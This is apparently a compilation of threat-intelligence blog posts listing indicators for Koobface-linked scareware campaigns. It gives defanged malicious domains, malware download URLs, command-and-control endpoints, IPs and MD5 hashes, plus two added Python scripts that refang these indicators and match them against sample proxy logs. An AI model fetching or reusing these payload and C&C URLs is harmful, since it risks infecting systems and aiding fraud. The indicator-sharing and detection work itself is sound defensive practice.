hxxp://vbxijhueurix.5nxs.com 
hxxp://fpkijxiiidox.5nxs.com 
hxxp://streqwaooxcg.5nxs.com 
hxxp://ptyewmaoolgy.5nxs.com 
hxxp://hgyeqboiihpw.5nxs.com 
hxxp://cxjijgueeaez.5nxs.com 
hxxp://woeobvoiihdt.5nxs.com 
hxxp://bcxixjueuqmj.5nxs.com 
hxxp://mmvobxoiihdr.5nxs.com 
hxxp://prqawnaoozgy.5nxs.com 
hxxp://xzkugsueeunk.5nxs.com 
hxxp://vvbovxiiidym.5nxs.com 
hxxp://qinozkiuidyw.5nxs.com 
hxxp://tpdumweuughh.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://zkfudpeaaech.5nxs.com 
hxxp://vvcijfueeamk.5nxs.com 
hxxp://jkhihdiuuypw.5nxs.com 
hxxp://womancoiuyav.5nxs.com 
hxxp://sfkoyfooepgh.5nxs.com 
hxxp://zzhetqaooxkd.5nxs.com 
hxxp://czjudyeaacjp.5nxs.com 
hxxp://gssudpeaaecg.5nxs.com 
hxxp://wiuobvooozjp.5nxs.com 
hxxp://twaamnaookhd.5nxs.com 
hxxp://bbvocloiigsr.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://dspugduuuytm.5nxs.com 
hxxp://kljigdueeqic.5nxs.com 
hxxp://gpioxhuuutav.5nxs.com 
hxxp://wouavcooiyil.5nxs.com 
hxxp://mevoxliuuyrm.5nxs.com 
hxxp://xvcocxoiojfy.5nxs.com 
hxxp://zljudyeaaunl.5nxs.com 
hxxp://woaabcoiusst.5nxs.com 
hxxp://dppudpeeewmh.5nxs.com 
hxxp://zzhustueequk.5nxs.com 
hxxp://quboczoiolgd.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://kdwetmoiuics.5nxs.com 
hxxp://jgfudseeerqb.5nxs.com 
hxxp://qunolhueeonx.5nxs.com 
hxxp://khdusyeaaeez.5nxs.com 
hxxp://bvcikgueequx.5nxs.com 
hxxp://xzjupteaovzg.5nxs.com 
hxxp://rmludpueoebj.5nxs.com 
hxxp://pfyupteeeauz.5nxs.com 
hxxp://qqreqnoeewhs.5nxs.com 
hxxp://ysfuyraaaczs.5nxs.com 
hxxp://ljdudyeaamcj.5nxs.com 
hxxp://vbvovziiustm.5nxs.com 
hxxp://gffugdueeibz.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://bnjdzkiuuyw.007gb.com 
hxxp://dpppdpeeeii.007gb.com 
hxxp://zzfdhdeeeoe.007gb.com 
hxxp://hhhhzciuusa.007gb.com 
hxxp://dpmlbkiuuta.007gb.com 
hxxp://ccgsgpeaaev.007gb.com 
hxxp://vbzxecoiuso.007gb.com 
hxxp://nbkfhdeaack.007gb.com 
hxxp://bmvcaoeeaoe.007gb.com 
hxxp://xchfggiuewq.007gb.com 
hxxp://jgypgpeaoxh.007gb.com 
Sample malicious domains known to have participated in the campaign: 

hxxp://hdstpraoojd.007gb.com 
hxxp://nnkkvziiigh.007gb.com 
hxxp://qwyduquuoeo.007gb.com 
hxxp://jhgdkzooobn.007gb.com 
hxxp://ljyqweoiihf.007gb.com 
hxxp://xzfdfsueaux.007gb.com 
hxxp://kjfhzjueeae.007gb.com 
hxxp://tanbuoeaanb.007gb.com 
hxxp://rammooaaocx.007gb.com 
hxxp://gsmxmlueoht.007gb.com 
hxxp://xxjgkguueuu.007gb.com 
hxxp://jgppfpeeaev.007gb.com 
hxxp://xzfpfpeaozh.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://khsphdueaev.007gb.com 
hxxp://wabnieoiikg.007gb.com 
hxxp://rojshgeoisw.007gb.com 
hxxp://zlhffgueaec.007gb.com 
hxxp://quxxmnoiokd.007gb.com 
hxxp://rpsdkzoeeqq.007gb.com 
hxxp://rozfksaoiht.007gb.com 
hxxp://vvzkcviiuru.007gb.com 
hxxp://ptgdghueedq.007gb.com 
hxxp://xvjhcliuufi.007gb.com 
hxxp://ywqntweaeqo.007gb.com 
hxxp://mubwqaaaoxl.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://quzjlgueeib.007gb.com 
hxxp://fdyttteeaou.007gb.com 
hxxp://xxjggseeeom.007gb.com 
hxxp://robvimoiikg.007gb.com 
hxxp://hgspsyeeanx.007gb.com 
hxxp://nbzkckueein.007gb.com 
hxxp://syfdgmoiipy.007gb.com 
hxxp://nmkjzjueequ.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://ytwqyteaaen.007gb.com 
hxxp://kgdfkhuuuyq.007gb.com 
hxxp://zbcvieaoocc.007gb.com 
hxxp://sywrdpeeeie.007gb.com 
hxxp://prnmwaaaamm.007gb.com 
hxxp://djddhfuuilc.007gb.com 
hxxp://wibnuboiusw.007gb.com 
hxxp://muclmboiigd.007gb.com 
hxxp://vvlkevoiidy.007gb.com 
hxxp://xhprrteaaun.007gb.com 
hxxp://bncvoeaaauu.007gb.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://ravhzluuewo.007gb.com 
hxxp://gsywptaaabz.007gb.com 
hxxp://xxkzbcoiijd.007gb.com 
hxxp://mevirwaaovlf.hostevo.com 
hxxp://roboxloiihdt.007sites.com 
hxxp://rauonbooozkf.007sites.com 
hxxp://ywiatreeewam.007sites.com 
hxxp://nxfetmaoolfr.007sites.com 
hxxp://gkmelbeuoear.007sites.com 
hxxp://mmcigsueeexg.007sites.com 
hxxp://vxxiljoioxxg.10fast.net 
hxxp://jgsuspeeeaic.10fast.net 
hxxp://qenocxiiihsr.10fast.net 
hxxp://lklilliiigdt.10fast.net 
hxxp://hgdepreaamzs.10fast.net 

Sample malicious domains known to have participated in the campaign: 

hxxp://gffupteaaebj.10fast.net 
hxxp://kljigfuuugfp.10fast.net 
hxxp://raianvoiokgy.10fast.net 
hxxp://rtqerqeaamcg.10fast.net 
hxxp://gfdugdeaavls.10fast.net 
hxxp://ddterboiugsr.10fast.net 
hxxp://jgpewnoiihpq.10fast.net 
hxxp://kjfpfseeeqo.007gb.com 
hxxp://wubcmciuuya.007gb.com 
hxxp://quzkxvooift.007gb.com 
hxxp://nblhlheaaum.007gb.com 
hxxp://cclxnciuupq.007gb.com 
hxxp://nbhkckueeib.007gb.com 
hxxp://hgddxliuudp.007gb.com 
hxxp://winilhueuwiz.10fast.net 
hxxp://queocliuupqv.10fast.net 
hxxp://gdtaqboiihhs.10fast.net 
hxxp://bbvovbaaancg.10fast.net 
hxxp://fpramvoiiftm.10fast.net 
hxxp://fjliljiiizhp.10fast.net 
hxxp://gspedpeeeiel.10fast.net 

Sample malicious domains known to have participated in the campaign: 

hxxp://fssukjaoanbx.5nxs.com 
hxxp://ptaawviuuppw.5nxs.com 
hxxp://llxozkoiikdq.5nxs.com 
hxxp://kkkijguuuquz.5nxs.com 
hxxp://womobciiiftn.5nxs.com 
hxxp://vvcikgueequl.5nxs.com 
hxxp://zzzoxcooozzl.5nxs.com 
hxxp://wuuocziuupwn.5nxs.com 
hxxp://hfyeqnoiiftm.5nxs.com 
hxxp://sttewboookgy.5nxs.com 
hxxp://ghhusteaozgt.5nxs.com 
hxxp://fjzoqtuuukiw.5nxs.com 
hxxp://muuaqciueomz.5nxs.com 
hxxp://fsfugduuutav.5nxs.com 
hxxp://jgdeywaoocks.5nxs.com 
hxxp://raniljuuurix.5nxs.com 
hxxp://pabikhueamcg.5nxs.com 
hxxp://gsteqbooikdr.5nxs.com 
hxxp://llhugfuuerab.5nxs.com 
hxxp://dspeyyeeeauv.5nxs.com 
hxxp://xzkixhuaoczg.5nxs.com 
hxxp://rouawmaaammz.5nxs.com 
hxxp://kxlijjiuuspt.5nxs.com 
hxxp://xzliljiuifyw.5nxs.com 
hxxp://vvvilhiueqac.5nxs.com 
hxxp://tovikhiiufdt.5nxs.com 
hxxp://ttretreeuhgs.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://ypserreeuytq.5nxs.com 
hxxp://xxzijkiiikkf.5nxs.com 
hxxp://bvzoknaoigpm.5nxs.com 
hxxp://nnxihduuutqv.5nxs.com 
hxxp://muzidyeeeevh.5nxs.com 
hxxp://tpdufhiiidrn.5nxs.com 
hxxp://ffpupteeeaqd.5nxs.com 
hxxp://bbxigseeolpm.5nxs.com 
hxxp://gsdugpeaeibj.5nxs.com 
hxxp://pwteyyeaamcg.5nxs.com 
hxxp://zxcoljiiigpw.5nxs.com 
hxxp://bmacxoiixjs.5nxs.com 
hxxp://twqawmaooczf.5nxs.com 
hxxp://bbrartuauhjh.5nxs.com 
hxxp://dtiolhueeexd.5nxs.com 

Sample malicious domains known to have participated in the campaign: 

hxxp://gdduhgiiikhd.5nxs.com 
hxxp://ryquhfuuuypr.5nxs.com 
hxxp://sfhijkiuusrn.5nxs.com 
hxxp://staennaoolgy.5nxs.com 
hxxp://vvvoczooolzg.5nxs.com 
hxxp://bmnokgueequz.5nxs.com 
hxxp://proocxoiigds.5nxs.com 
hxxp://ptwepwaoozht.5nxs.com 
hxxp://fsdufpeeeovg.5nxs.com 
hxxp://dtlidwoiuyoz.5nxs.com 
hxxp://kvyamboiuhsr.5nxs.com 
hxxp://kvmardioetyp.5nxs.com 
hxxp://taniljueuwul.5nxs.com 
hxxp://jvnartuuixvx.5nxs.com 
hxxp://qubijgiuutac.5nxs.com 

Sample malicious domains known to have participated in the campaigns: 

hxxp://qebocziuidfy.10fast.net 
hxxp://gffudpeeeauc.10fast.net 
hxxp://vbjustaiurox.10fast.net 
hxxp://jgyuptaoutic.10fast.net 
hxxp://lkhighueeevk.10fast.net 
hxxp://ptpudreeeobz.10fast.net 
hxxp://meeambaooxls.10fast.net 
hxxp://yrreyraaovld.10fast.net 
hxxp://kkdutwaoobzd.10fast.net 
hxxp://czxitbouuquz.10fast.net 
hxxp://lvbovnaoozjp.10fast.net 
hxxp://wiiambaookdt.10fast.net 
hxxp://zxkijgueaecg.10fast.net 
hxxp://ywqawqaoovzh.10fast.net 
hxxp://gzoukwuuizbv.10fast.net 
hxxp://roiabcoiigpq.10fast.net 
hxxp://vvlufseaavld.10fast.net 
hxxp://hgpusyeaamxg.10fast.net 
hxxp://kkkikziiifyq.10fast.net 
hxxp://dtqaczoiuswb.10fast.net 
hxxp://llzozxoiigpw.10fast.net 
hxxp://nmcijkiuuobg.10fast.net 
hxxp://mnxijliuusrm.10fast.net 
hxxp://quuanbooikfy.10fast.net 
hxxp://xxzijhuueuex.10fast.net 
hxxp://gsyepyeaaubk.10fast.net 
hxxp://tqoaqmaoigsr.10fast.net 
hxxp://cvbocziiikgp.10fast.net 
hxxp://gdyepteaancj.10fast.net 

Sample malicious domains known to have participated in the campaign: 

hxxp://qibocziuewuz.10fast.net 
hxxp://qrkargoaatsf.10fast.net 
hxxp://zzdeymaoifyq.10fast.net 
hxxp://noeancoiutac.10fast.net 
hxxp://qunovnaaammb.10fast.net 
hxxp://gffugdeeeibk.10fast.net 
hxxp://cmvijsueenls.10fast.net 
hxxp://tqaeryeaanxj.10fast.net 
hxxp://xmuambiiifyt.10fast.net 
hxxp://cvnanneeesff.10fast.net 
hxxp://muuaqbooolfy.10fast.net 
hxxp://qimacvaaetyr.10fast.net 
hxxp://vxfutqaoihsw.10fast.net 
hxxp://ywreyruuuhhg.10fast.net 
hxxp://fdteyteeeoel.10fast.net 
hxxp://ywianvoiupwc.10fast.net 
hxxp://zlgeyraoobls.10fast.net 
hxxp://zkhujdeaojpm.10fast.net 
hxxp://kjfufduuutqm.10fast.net 
hxxp://xxjudpueewiz.10fast.net 
hxxp://rooewmeaamcg.10fast.net 
hxxp://hffugdueeink.10fast.net 
hxxp://xmcoxzoiikkd.10fast.net 
hxxp://lllizkuiifyq.10fast.net 
hxxp://xmuapsuiovnb.10fast.net 
hxxp://tquanvoiuyqv.10fast.net 
hxxp://kvnartuuujlk.10fast.net 
hxxp://lllikhioozjf.10fast.net 
hxxp://yrreypeeamck.10fast.net 
hxxp://glhihfueaeck.10fast.net 

Sample malicious domains known to have participated in the campaign: 

hxxp://goadult.info/go.php?sid=13 -> hxxp://goadult.info/go.php?sid=9 -> hxxp://r2606.com/go/?pid=30937, which is a well known Koobface 1.0 command and control server domain. 

Related malicious redirectors known to have 
participated in the campaign: 

hxxp://goadult.info - 78.109.28.16 - tech(a)goadult.info 

hxxp://golgo.net - 174.36.214.32 - tech@golgo.net 

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info 
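The redirection chain and redirector list above are the kind of indicators a defender turns into a detection. The following Python script is an added example, not code from the original post: it parses lines written in the post's own defanged format (hxxp://, (a) for @, "MD5:" prefixes), refangs them into domain, IP, MD5 and e-mail lookup sets, and then replays proxy log lines per client so that a client which touched the TDS (goadult.info) and then the Koobface C&C (r2606.com) shows up as having completed the chain. The indicator lines are taken from this post; the proxy log lines, the client addresses and the timestamps are constructed for the example.

```python
"""Refang the indicators from a Historical OSINT post and replay proxy logs
against them.  Added example, not part of the original post; log lines are
constructed."""
import re
from urllib.parse import urlsplit

# Indicator lines copied from the post, in the post's own defanged format.
POST_LINES = """
hxxp://goadult.info - 78.109.28.16 - tech(a)goadult.info
hxxp://golgo.net - 174.36.214.32 - tech@golgo.net
hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info
hxxp://r2606.com/go/?pid=30937
hxxp://urodinam.net/33t.php?stime=125558
installer.l.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef
""".strip().splitlines()

# Constructed proxy log lines: timestamp, client IP, method, URL.
LOG_LINES = [
    "2010-03-01T10:00:01Z 10.1.2.3 GET http://goadult.info/go.php?sid=13",
    "2010-03-01T10:00:02Z 10.1.2.3 GET http://goadult.info/go.php?sid=9",
    "2010-03-01T10:00:03Z 10.1.2.3 GET http://r2606.com/go/?pid=30937",
    "2010-03-01T10:05:00Z 10.1.2.9 GET http://example.com/index.html",
    "2010-03-01T10:06:00Z 10.1.2.7 GET http://174.36.214.32/tds/go.php?sid=4",
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5 = re.compile(r"\b[0-9a-fA-F]{32}\b")
DEFANGED_URL = re.compile(r"hxxps?://\S+", re.IGNORECASE)
# Accept both '@' and the '(a)' defanging the post uses for e-mail addresses.
EMAIL = re.compile(r"[\w.+-]+(?:@|\(a\))[\w-]+(?:\.[\w-]+)+")


def refang(text):
    """Undo the post's defanging so standard parsers accept the value."""
    text = re.sub(r"^hxxp", "http", text, flags=re.IGNORECASE)
    return text.replace("(a)", "@").replace("[.]", ".")


def extract_indicators(lines):
    """Return {'domains', 'ips', 'md5', 'emails'} sets built from post lines."""
    ind = {"domains": set(), "ips": set(), "md5": set(), "emails": set()}
    for line in lines:
        for url in DEFANGED_URL.findall(line):
            host = urlsplit(refang(url)).hostname
            # IP-hosted URLs are caught by the IPV4 pass below.
            if host and not IPV4.fullmatch(host):
                ind["domains"].add(host.lower())
        ind["ips"].update(IPV4.findall(line))
        ind["md5"].update(h.lower() for h in MD5.findall(line))
        ind["emails"].update(refang(e).lower() for e in EMAIL.findall(line))
    return ind


def redirect_chains(log_lines, indicators):
    """Per client, the ordered list of indicator hosts it contacted.

    A client whose list runs TDS -> C&C completed the redirection chain
    described in the post; a single-host client may only have been
    redirected part-way and is still worth a look."""
    chains = {}
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line: skip rather than crash the sweep
        client, url = parts[1], parts[3]
        host = urlsplit(url).hostname
        if host is None:
            continue
        host = host.lower()
        if host in indicators["domains"] or host in indicators["ips"]:
            chains.setdefault(client, []).append(host)
    return chains


if __name__ == "__main__":
    ind = extract_indicators(POST_LINES)
    for client, hosts in redirect_chains(LOG_LINES, ind).items():
        print(client, " -> ".join(hosts))
```

Matching on hostname rather than on the full URL is deliberate: the TDS parameters (sid=, pid=, aid=) change per redirect, so a full-URL blocklist built from one published chain would miss the next visitor.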
Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34) 

It's 2010 and we've recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface gang actively serving fake security software also known as scareware to a variety of users with the majority of malicious software conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP successfully hosting a diverse portfolio of fake security software. 

In this post, I'll provide actionable intelligence on the infrastructure behind the campaign and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 



Sample malware known to have participated in the campaign: 

installer.l.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef - Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40 (22.50 %) 

Related malicious phone back C&C server IPs: 

hxxp://av-plusonline.org/install/avplus.dll 
hxxp://av-plusonline.org/cb/real.php?id= 

Related malicious MD5s known to have participated in the campaign: 

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %) 

It gets even more interesting as hxxp://fast-payments.com - 91.188.59.27 is parked within Koobface botnet's 1.0 phone back locations (hxxp://urodinam.net) and is also hosted within the same netblock at 91.188.59.10. 

Sample related malicious URLs known to have participated in the campaign: 

hxxp://urodinam.net/33t.php?stime=125558 
hxxp://91.188.59.10/opa.exe - MD5: d4aacc8d01487285be564cbd3a4abc76 - Downloader.VB.7.S; Mal/Koobface-B - Result: 10/40 (25 %) 



Once executed a sample malware phones back to the following malicious C&C server IPs: 

hxxp://aburvalg.com/newl.php - 64.27.0.237 
hxxp://fucking-tube.net 

The following domains use it as a name server: 

hxxp://nsl.addedantivirus.com 

Related malicius domains known to have responded 
to the same malicious name server: 

hxxp://antivi ralpluss.org 

hxxp://antivi rspluss.org 

hxxp://avon I inescanerr.org 

hxxp://on I ine-scannerr.org 

hxxp://on I inescanerr.org 

hxxp://on I inescannerr.org 

hxxp://pretection-page.org 

hxxp://sys-mesage.org 

hxxp://av-pl US-on I ine.org 

hxxp://av-pl usonline.org 
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hxxp://avpl US-on I ine.org 
hxxp://avpl usonline.org 



hxxp://avpl ussonline.org 
hxxp://protecmesages.org 
hxxp://protect-mesagess.org 
hxxp://protectmesages.org 
hxxp://protectmesagess.org 
hxxp://protectmessages.org 
hxxp://avplus24su pport.com 
hxxp://search webway4.com 
hxxp://searchwebway5.com 
hxxp://search webway 10.com 
hxxp://search webway9.com 
hxxp://search webway6.com 

Related malicious URLs known to have participated 
in the campaign: 

hxxp://avplus-online.org/buy.php?id = 

- hxxp://fast-payments.com/index.php?prodid=antivirplus 
_02 _01 &afid = 

Related malicious domains known to have 
participated in the campaign: 

hxxp://antiviruspluss.org 
hxxp://avplusscanner.org 
hxxp://protection-messag.org 
hxxp://antivirs-pluss.org 
hxxp://antiviru-pluss.org 
hxxp://antivirus-pluss.org 
hxxp://protection-mesage.org 
hxxp://sysstem-mesage.org 
hxxp://system-message.org 
hxxp://antiviral-pluss.org 
hxxp://av-onlinescanner.org 
hxxp://avonlinescanner.org 
hxxp://avonlinescannerr.org 
hxxp://avp-scanner.org 
hxxp://avp-scannerr.org 
hxxp://avp-sscaner.org 
hxxp://avp-sscannerr.org 
hxxp://avplscaner-online.org 
hxxp://avplscanerr-online.org 
hxxp://avplsscannerr.org 
hxxp://avplus-scanerr.org 
hxxp://online-protection.org 
hxxp://antivirupluss.org 
hxxp://syssmessage.org 
hxxp://avonlinescanerr.org 
hxxp://online-scannerr.org 
hxxp://onlinescanerr.org 
hxxp://onlinescannerr.org 
hxxp://av-scanally.org 
hxxp://av-scaner-online.org 
hxxp://av-scaner-online3k.org 
hxxp://av-scaner-onlineband.org 
hxxp://av-scaner-onlinebody.org 
hxxp://av-scaner-onlinebuzz.org 
hxxp://av-scaner-onlinecabin.org 
hxxp://av-scaner-onlinecrest.org 
hxxp://av-scaner-onlinefolk.org 
hxxp://av-scaner-onlineplan.org 
hxxp://av-scaner-onlinesite.org 
hxxp://iav-scaner-online.org 
hxxp://netav-scaner-online.org 
hxxp://techav-scaner-online.org 
hxxp://antivirspluss.org 
hxxp://sys-mesage.org 
hxxp://antiviralpluss.org 
hxxp://pretection-page.org 
hxxp://av-scaner-onlinefairy.org 
hxxp://av-scaner-onlinegrinder.org 
hxxp://av-scaner-onlinehistory.org 
hxxp://av-scaner-onlineicity.org 
hxxp://av-scaner-onlinemachine.org 
hxxp://av-scaner-onlinepeople.org 
hxxp://av-scaner-onlineretort.org 
hxxp://av-scaner-onlinereview.org 
hxxp://av-scaner-onlinetopia.org 
hxxp://directav-scaner-online.org 
hxxp://expertav-scaner-online.org 
hxxp://orderav-scaner-online.org 
hxxp://speedyav-scaner-online.org 
hxxp://thriftyav-scaner-online.org 
hxxp://timesav-scaner-online.org 
hxxp://41online-scanner-free.org 
hxxp://dynaonline-scanner-free.org 
hxxp://fastonline-scanner-free.org 
hxxp://homeonline-scanner-free.org 
hxxp://online-scanner-freebin.org 
hxxp://online-scanner-freebuy.org 
hxxp://online-scanner-freelook.org 
hxxp://online-scanner-freemap.org 
hxxp://online-scanner-freemeet.org 
hxxp://online-scanner-freesite.org 
hxxp://online-scanner-freetent.org 
hxxp://online-scanner-freeu.org 
hxxp://online-scanner-freevolt.org 
hxxp://onlinescannerfree.org 
hxxp://av-plus-online.org 
hxxp://protecmesages.org 
hxxp://av-onlicity.org 
hxxp://av-online-scanner.org 
hxxp://av-online-scannerbid.org 
hxxp://av-online-scannercrest.org 
hxxp://av-online-scannerfolk.org 
hxxp://av-online-scannergate.org 
hxxp://av-online-scannerland.org 
hxxp://av-online-scannerpc.org 
hxxp://av-online-scannersite.org 
hxxp://av-online-scannerweek.org 
hxxp://av-online-scannerwing.org 
hxxp://infoav-online-scanner.org 
hxxp://shopav-online-scanner.org 
hxxp://theav-online-scanners.org 
hxxp://avplus-online.org 
hxxp://protectmesages.org 
hxxp://av-scaner.org 
hxxp://av-scaners.org 
hxxp://av-scanner.org 
hxxp://av-scanners.org 
hxxp://avplussonline.org 
hxxp://avscaner.org 
hxxp://avscaners.org 
hxxp://avscanner.org 
hxxp://avscanners.org 
hxxp://eav-scaner.org 
hxxp://eav-scaners.org 
hxxp://eav-scanner.org 
hxxp://eav-scanners.org 
hxxp://myav-scaner.org 
hxxp://myav-scaners.org 
hxxp://myav-scanner.org 
hxxp://myav-scanners.org 
hxxp://protectmessages.org 
hxxp://avplusonline.org 
hxxp://av-plusonline.org 
hxxp://protect-mesagess.org 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
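The posts above publish their indicators in defanged form (hxxp://, "- MD5:" annotations, a trailing IP after the URL, chain markers "-" and "=") and carry the affiliate identifier in the query string of the landing and payment URLs. Turning such a dump into something a blocklist or a SIEM lookup can consume is the first thing a practitioner does with it. The following script is an added example, not code from the post or its author; SAMPLE_DUMP is constructed from lines in the page's own notation, and treating "aff" and "siteid" as affiliate keys is an assumption based on where the chains above pass them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: lines copied in the page's own defanged notation,
# drawn from several of the posts above (not one real capture).
SAMPLE_DUMP = """\
hxxp://urodinam.net/33t.php?stime=125558
- hxxp://91.188.59.10/opa.exe - MD5: d4aacc8d01487285be564cbd3a4abc76 - Mal/Koobface-B
hxxp://aburvalg.com/newl.php - 64.27.0.237
hxxp://avplus-online.org/buy.php?id=
- hxxp://fast-payments.com/index.php?prodid=antivirplus_02_01&afid=
- hxxp://scaner24.org/?affid=184 - 91.212.127.19
= hxxps://secure-signupway.com/promo/join.aspx?siteid=3388
hxxp://Avplus-Online.org/
"""

URL_RE = re.compile(r"h(?:xx|tt)ps?://\S+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")
# Query keys the chains use to carry the affiliate identifier (assumption:
# 'aff' and 'siteid' count as affiliate keys because the redirection chains
# above hand them to the signup/payment pages).
AFFILIATE_KEYS = ("affid", "afid", "aff", "siteid")


def refang(url: str) -> str:
    """hxxp:// -> http://, hxxps:// -> https:// (case-insensitive)."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def parse_dump(text: str) -> dict:
    """Return deduplicated domains, IPv4s, MD5s and per-host affiliate IDs."""
    found = {"domains": set(), "ips": set(), "md5s": set(), "affiliate_ids": {}}
    for raw in text.splitlines():
        line = raw.strip().lstrip("-= ").strip()   # drop the chain markers
        if not line:
            continue
        for digest in MD5_RE.findall(line):
            found["md5s"].add(digest.lower())
        for url in URL_RE.findall(line):
            parts = urlsplit(refang(url))
            host = (parts.hostname or "").lower()
            if not host:
                continue
            if IPV4_RE.fullmatch(host):
                found["ips"].add(host)
            else:
                found["domains"].add(host)
            query = parse_qs(parts.query, keep_blank_values=True)
            for key in AFFILIATE_KEYS:
                value = query.get(key, [""])[0]
                if value:                      # blank IDs (elided on the page) are skipped
                    found["affiliate_ids"][host] = value
        for ip in IPV4_RE.findall(line):      # IPs written next to a URL, not inside it
            found["ips"].add(ip)
    return found


def blocklist(found: dict) -> list:
    """Sorted domain + IP list ready for a DNS RPZ or proxy deny list."""
    return sorted(found["domains"]) + sorted(found["ips"])
```

Run parse_dump(SAMPLE_DUMP) and the host case difference between the two avplus-online.org entries collapses, the empty id=/afid= values are ignored instead of being recorded as an affiliate ID, and the two non-blank IDs (184 and 3388) are kept per host so that campaigns can later be grouped by affiliate.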
Historical OSINT - Massive Scareware Dropping 
Campaign Spotted in the Wild (2018-10-20 22:38) 

It's 2008 and I've recently spotted a currently circulating 
malicious and fraudulent scareware-serving domain portfolio, 
which I'll expose in this post in order to share actionable 
threat intelligence with the security community, further 
exposing and undermining the cybercrime ecosystem and 
empowering security researchers and third-party vendors 
with the data needed to stay ahead of current and emerging 
threats. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://50virus-scanner.com 
hxxp://700virus-scanner.com 
hxxp://antivirus-test66.com 
hxxp://antivirus200scanner.com 
hxxp://antivirus600scanner.com 
hxxp://antivirus800scanner.com 
hxxp://antivirus900scanner.com 
hxxp://av-scanner200.com 
hxxp://av-scanner300.com 
hxxp://av-scanner400.com 
hxxp://av-scanner500.com 
hxxp://inetproscan031.com 
hxxp://internet-scan020.com 
hxxp://novirus-scan00.com 
hxxp://stopvirus-scan11.com 
hxxp://stopvirus-scan13.com 
hxxp://stopvirus-scan16.com 
hxxp://stopvirus-scan33.com 
hxxp://virus66scanner.com 
hxxp://virus77scanner.com 
hxxp://virus88scanner.com 
hxxp://antivirus-scan200.com 
hxxp://antispy-scan200.com 
hxxp://antivirus-scan400.com 
hxxp://antispy-scan400.com 
hxxp://antivirus-scan600.com 
hxxp://antispy-scan600.com 
hxxp://antivirus-scan700.com 
hxxp://antispy-scan700.com 
hxxp://av-scanner700.com 
hxxp://antispy-scan800.com 
hxxp://antivirus-scan900.com 
hxxp://stop-virus-010.com 
hxxp://spywarescan010.com 
hxxp://antispywarehelp010.com 
hxxp://internet-scanner020.com 
hxxp://insight-scan20.com 
hxxp://internet-scanner030.com 
hxxp://stop-virus-040.com 
hxxp://internet-scan040.com 
hxxp://insight-scan40.com 
hxxp://internet-scan050.com 
hxxp://internet-scanner050.com 
hxxp://insight-scan60.com 
hxxp://stop-virus-070.com 
hxxp://internet-scan070.com 
hxxp://internet-scanner070.com 
hxxp://insight-scan80.com 
hxxp://stop-virus-090.com 
hxxp://internet-scan090.com 
hxxp://internet-scanner090.com 
hxxp://insight-scan90.com 
hxxp://antispywarehelpk0.com 
hxxp://inetproscan001.com 
hxxp://novirus-scan01.com 
hxxp://spyware-stop01.com 
hxxp://antivirus-inet01.com 
hxxp://novirus-scan31.com 
hxxp://antivirus-inet31.com 
hxxp://novirus-scan41.com 
hxxp://antivirus-inet41.com 
hxxp://antivirus-inet51.com 
hxxp://inetproscan061.com 
hxxp://novirus-scan61.com 
hxxp://inetproscan081.com 
hxxp://novirus-scan81.com 
hxxp://inetproscan091.com 
hxxp://spyware-stopb1.com 
hxxp://spyware-stopm1.com 
hxxp://spyware-stopn1.com 
hxxp://spyware-stopz1.com 
hxxp://antispywarehelp002.com 
hxxp://antispywarehelp022.com 
hxxp://novirus-scan22.com 
hxxp://antispywarehelpk2.com 
hxxp://insight-scanner2.com 
hxxp://spywarescan013.com 
hxxp://novirus-scan33.com 
hxxp://antispywarehelp004.com 
hxxp://antispywarehelpk4.com 
hxxp://spywarescan015.com 
hxxp://novirus-scan55.com 
hxxp://insight-scanner5.com 
hxxp://stopvirus-scan66.com 
hxxp://antispywarehelpk6.com 
hxxp://spywarescan017.com 
hxxp://insight-scanner7.com 
hxxp://antispywarehelp008.com 
hxxp://spywarescan018.com 
hxxp://stopvirus-scan18.com 
hxxp://novirus-scan88.com 
hxxp://stopvirus-scan88.com 
hxxp://antivirus-test88.com 
hxxp://antispywarehelpk8.com 
hxxp://insight-scanner8.com 
hxxp://insight-scanner9.com 
hxxp://10scanantispyware.com 
hxxp://20scanantispyware.com 
hxxp://30scanantispyware.com 
hxxp://60scanantispyware.com 
hxxp://80scanantispyware.com 
hxxp://2scanantispyware.com 
hxxp://3scanantispyware.com 
hxxp://5scanantispyware.com 
hxxp://7scanantispyware.com 
hxxp://8scanantispyware.com 
hxxp://spyware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp://90virus-scanner.com 
hxxp://antivirus10scanner.com 
hxxp://net001antivirus.com 
hxxp://net011antivirus.com 
hxxp://net111antivirus.com 
hxxp://net021antivirus.com 
hxxp://net-02antivirus.com 
hxxp://net222antivirus.com 
hxxp://net-04antivirus.com 
hxxp://net-05antivirus.com 
hxxp://net-07antivirus.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
Historical OSINT - Malware Domains Impersonating 
Google (2018-10-20 22:51) 

It's 2008 and I've recently stumbled upon a currently active 
